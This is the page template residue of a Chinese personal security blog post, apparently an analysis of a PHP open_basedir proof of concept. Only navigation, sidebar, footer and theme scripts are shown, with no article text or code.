              <a href="/post/karaf-arbitrary-file-write/index.html" rel="next" title="tctf ghost pepper writeup 与karaf框架一处简单的代码审计(CVE-2019-0226)">
                <i class="fa fa-chevron-left"></i> tctf ghost pepper writeup 与karaf框架一处简单的代码审计(CVE-2019-0226)
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/post/threatIntelligence/index.html" rel="prev" title="浅谈威胁情报">
                浅谈威胁情报 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="https://avatars0.githubusercontent.com/u/26888704?s=460&v=4" alt="Imagemlt">
            
              <p class="site-author-name" itemprop="name">Imagemlt</p>
              <p class="site-description motion-element" itemprop="description">personal blog</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">59</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">15</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">12</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/imagemlt" target="_blank" title="GitHub" rel="external nofollow"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
            </div>
          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#php-open-basedir-poc分析"><span class="nav-number">1.</span> <span class="nav-text">php open_basedir poc分析</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Imagemlt</span>

  

  
</div>


  



  <div class="powered-by">Powered by <a class="theme-link" target="_blank" rel="external nofollow" href="https://hexo.io">Hexo</a> v3.8.0</div>



  <span class="post-meta-divider">|</span>

Hosted by <a href="https://pages.coding.me" style="font-weight: bold">Coding Pages</a>

  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" rel="external nofollow" href="https://github.com/theme-next/hexo-theme-next">NexT.Pisces</a> v6.3.0</div>




  <script src="https://unpkg.com/mermaid@7.1.2/dist/mermaid.min.js"></script>
  <script>
    if (window.mermaid) {
//alert("mermaid!!!");
      mermaid.initialize({theme: 'forest'});
    }
  </script>


        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



	





  





  










  





  

  

  

  

  
  

  

  

  

  

  

</body>
</html>
